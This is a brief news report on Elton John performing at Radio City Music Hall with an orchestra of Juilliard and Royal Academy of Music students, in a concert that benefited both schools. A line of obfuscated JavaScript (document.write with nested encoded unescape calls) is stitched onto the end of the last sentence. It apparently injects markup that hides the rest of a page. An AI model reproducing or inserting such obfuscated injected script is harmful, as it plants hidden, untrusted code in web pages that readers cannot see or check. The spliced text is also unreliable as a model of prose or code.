Elton John has performed with some big names and at some big places. But never before had he appeared with a full symphony orchestra in North America.
During a concert Tuesday night at Radio City Music Hall in New York, he did both. The orchestra was comprised of handpicked students from the Julliard School and London's Royal Academy of Music, which John once attended. Enormous video monitors on the sides of the stage displayed on-stage close-ups, including images from a piano cam, which captured John's fingers flying across the keys. Proceeds from the show benefited the Julliard School and the Royal Academy of Music.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
